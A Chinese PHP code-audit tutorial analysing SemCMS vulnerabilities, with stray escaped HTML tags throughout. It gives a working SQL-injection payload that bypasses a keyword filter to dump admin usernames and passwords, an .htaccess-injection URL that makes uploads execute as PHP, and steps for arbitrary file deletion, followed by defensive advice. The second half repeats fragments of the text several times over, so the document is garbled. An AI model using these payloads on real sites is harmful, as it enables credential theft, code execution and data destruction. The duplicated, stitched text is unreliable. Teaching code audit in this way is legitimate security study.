PHP代码审计教学：某CMS漏洞分析与利用<\/h1>

0x00 前言<\/h2>
本教学文档基于某CMS的代码审计实践，适合代码审计初学者学习。该CMS代码结构简单，漏洞成因经典，是学习PHP代码审计的优秀案例。<\/p>

0x01 前台SQL注入漏洞分析<\/h2>

漏洞位置<\/h3>
`\/semcms\/Templete\/default\/Include\/index.php<\/code> -> web_inc.php<\/code><\/p>`

漏洞成因<\/h3>


包含文件流程：<\/p>

db_conn.php<\/code>：建立数据库连接<\/li>
contorl.php<\/code>：对$_GET<\/code>进行全局过滤危险SQL函数<\/li>
<\/ul>
<\/li>

关键漏洞代码：<\/p>
<\/li>
<\/ol>
$Language =<\/span> test_input<\/span>(verify_str<\/span>($_POST["languageID"<\/span>]));
<\/span><\/span>\/\/ 直接拼接进SQL语句，无引号包裹
<\/span><\/span><\/span><\/code><\/pre>
过滤绕过：<\/li>
<\/ol>

verify_str<\/code>函数过滤了select<\/code>等关键词<\/li>
test_input<\/code>函数中的stripslashes<\/code>可去除反斜杠<\/li>
通过反斜杠转义绕过过滤：uni\on sel\ect<\/code><\/li>
<\/ul>
利用Payload<\/h3>
languageID=-1 uni\on sel\ect 1,concat(user_admin,0x2d,user_ps),3,4,5,6,7,8,9,10,11,12,13,14 from sc_user un\ion
<\/code><\/pre>
回显位置<\/h3>
注入结果存储在$tag_indexmetatit<\/code>变量中，最终通过echo<\/code>输出到页面。<\/p>
0x02 后台地址寻找尝试<\/h2>
后台地址生成<\/h3>
semcms\/install\/index.php<\/code>中随机生成后台地址：<\/p>
$ht_filename =<\/span> substr<\/span>(md5<\/span>(time<\/span>().<\/span>rand<\/span>(1000<\/span>,9999<\/span>)),8<\/span>,6<\/span>);
<\/span><\/span><\/code><\/pre>寻找失败原因<\/h3>

全局搜索$ht_filename<\/code>变量无引用代码<\/li>
尝试通过目录遍历漏洞寻找但未成功<\/li>
<\/ol>
0x03 GetShell思路分析<\/h2>
危险函数定位方法<\/h3>

文件包含函数：require<\/code>, include<\/code>, require_once<\/code>, include_once<\/code><\/li>
文件操作函数：file_get_contents<\/code>, file_put_contents<\/code>, copy<\/code>, unlink<\/code>等<\/li>
代码注入函数：eval<\/code>, assert<\/code>, preg_replace<\/code><\/li>
命令执行函数：exec<\/code>, system<\/code>, shell_exec<\/code>等<\/li>
变量覆盖函数：extract<\/code>, parse_str<\/code><\/li>
<\/ol>
后台GetShell漏洞分析<\/h3>
漏洞位置<\/h4>
file_put_contents<\/code>函数写入文件操作<\/p>
关键代码<\/h4>
function<\/span> Mbapp<\/span>($mb,$lujin,$mblujin,$dirpaths,$htmlopen){
<\/span><\/span>    $template=<\/span>"index.php,hta\/"<\/span>.<\/span>$ml.<\/span>"\/.htaccess"<\/span>;
<\/span><\/span>    $template_mb=<\/span>explode<\/span>(","<\/span>,$template);
<\/span><\/span>    for<\/span>($i=<\/span>0<\/span>;$i<<\/span>count<\/span>($template_mb);$i++<\/span>){
<\/span><\/span>        $template_o =<\/span> file_get_contents<\/span>($mblujin.<\/span>'Templete\/'<\/span>.<\/span>$mb.<\/span>'\/Include\/'<\/span>.<\/span>$template_mb[$i]);
<\/span><\/span>        $templateUrl =<\/span> $lujin.<\/span>str_replace<\/span>("hta\/"<\/span>.<\/span>$ml.<\/span>"\/"<\/span>,""<\/span>,$template_mb[$i]);
<\/span><\/span>        $output =<\/span> str_replace<\/span>('<{Template}>'<\/span>, $mb, $template_o);
<\/span><\/span>        file_put_contents<\/span>($templateUrl, $output);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>两种利用方式<\/h4>


修改index.php<\/strong>：<\/p>

尝试写入PHP代码<\/li>
但verify_str<\/code>过滤了单引号，利用失败<\/li>
<\/ul>
<\/li>

修改.htaccess<\/strong>：<\/p>

可写入Apache配置<\/li>
Payload: \/semcms\/N8D3ch_Admin\/SEMCMS_Template.php?CF=template&mb=default\/%0aSetHandler%20application\/x-httpd-php%0a%23\/..\/..<\/code><\/li>
效果：使上传文件被当作PHP解析<\/li>
限制：需Apache module模式且Linux环境<\/li>
<\/ul>
<\/li>
<\/ol>
0x04 任意文件删除漏洞<\/h2>
漏洞位置<\/h3>
后台图片删除功能<\/p>
漏洞成因<\/h3>

文件路径入库时仅经过test_input<\/code>，未过滤..<\/code><\/li>
删除时直接从数据库读取路径，无二次过滤<\/li>
关键函数Delfile<\/code>直接使用unlink<\/code>删除文件<\/li>
<\/ol>
利用步骤<\/h3>

上传图片时设置路径为..\/rmme.txt<\/code><\/li>
删除该图片时，实际删除网站根目录下的rmme.txt<\/code><\/li>
<\/ol>
0x05 总结<\/h2>
漏洞链<\/h3>

前台无限制SQL注入 → 获取管理员账号密码<\/li>
后台地址随机生成 → 难以直接访问<\/li>
后台文件操作漏洞 → 可能的GetShell途径<\/li>
任意文件删除 → 破坏性操作<\/li>
<\/ol>
学习要点<\/h3>

输入过滤不严导致的SQL注入<\/li>
反斜杠转义绕过过滤的技巧<\/li>
文件操作函数的安全风险<\/li>
二次漏洞的利用方式<\/li>
代码审计中危险函数的定位方法<\/li>
<\/ol>
防御建议<\/h3>

所有用户输入必须严格过滤<\/li>
数据库查询使用参数化查询<\/li>
文件操作限制路径范围<\/li>
敏感操作增加二次验证<\/li>
避免直接拼接用户输入到SQL语句中<\/li>
<\/ol>

PHP代码审计教学：某CMS漏洞分析与利用<\/h1>

0x00 前言<\/h2>
本教学文档基于某CMS的代码审计实践，适合代码审计初学者学习。该CMS代码结构简单，漏洞成因经典，是学习PHP代码审计的优秀案例。<\/p>

0x01 前台SQL注入漏洞分析<\/h2>

漏洞位置<\/h3>
`\/semcms\/Templete\/default\/Include\/index.php<\/code> -> web_inc.php<\/code><\/p>`

回显位置<\/h3>
注入结果存储在`$tag_indexmetatit<\/code>变量中，最终通过echo<\/code>输出到页面。<\/p>`

0x03 GetShell思路分析<\/h2>

后台GetShell漏洞分析<\/h3>

漏洞位置<\/h4>
`file_put_contents<\/code>函数写入文件操作<\/p>`

0x04 任意文件删除漏洞<\/h2>

漏洞位置<\/h3>
后台图片删除功能<\/p>

0x05 总结<\/h2>

防御建议<\/h3>

所有用户输入必须严格过滤<\/li>
数据库查询使用参数化查询<\/li>
文件操作限制路径范围<\/li>
敏感操作增加二次验证<\/li>
避免直接拼接用户输入到SQL语句中<\/li> <\/ol>

PHP代码审计教学：某CMS漏洞分析与利用<\/h1>

0x00 前言<\/h2> 本教学文档基于某CMS的代码审计实践，适合代码审计初学者学习。该CMS代码结构简单，漏洞成因经典，是学习PHP代码审计的优秀案例。<\/p>

0x01 前台SQL注入漏洞分析<\/h2>

漏洞位置<\/h3> \/semcms\/Templete\/default\/Include\/index.php<\/code> -> web_inc.php<\/code><\/p>

回显位置<\/h3> 注入结果存储在$tag_indexmetatit<\/code>变量中，最终通过echo<\/code>输出到页面。<\/p>

0x03 GetShell思路分析<\/h2>

后台GetShell漏洞分析<\/h3>

漏洞位置<\/h4> file_put_contents<\/code>函数写入文件操作<\/p>

0x04 任意文件删除漏洞<\/h2>

漏洞位置<\/h3> 后台图片删除功能<\/p>

0x05 总结<\/h2>

防御建议<\/h3> 所有用户输入必须严格过滤<\/li> 数据库查询使用参数化查询<\/li> 文件操作限制路径范围<\/li> 敏感操作增加二次验证<\/li> 避免直接拼接用户输入到SQL语句中<\/li> <\/ol>

0x00 前言<\/h2>
本教学文档基于某CMS的代码审计实践，适合代码审计初学者学习。该CMS代码结构简单，漏洞成因经典，是学习PHP代码审计的优秀案例。<\/p>

漏洞位置<\/h3>
`\/semcms\/Templete\/default\/Include\/index.php<\/code> -> web_inc.php<\/code><\/p>`

回显位置<\/h3>
注入结果存储在`$tag_indexmetatit<\/code>变量中，最终通过echo<\/code>输出到页面。<\/p>`

漏洞位置<\/h4>
`file_put_contents<\/code>函数写入文件操作<\/p>`

漏洞位置<\/h3>
后台图片删除功能<\/p>

防御建议<\/h3>

所有用户输入必须严格过滤<\/li>
数据库查询使用参数化查询<\/li>
文件操作限制路径范围<\/li>
敏感操作增加二次验证<\/li>
避免直接拼接用户输入到SQL语句中<\/li> <\/ol>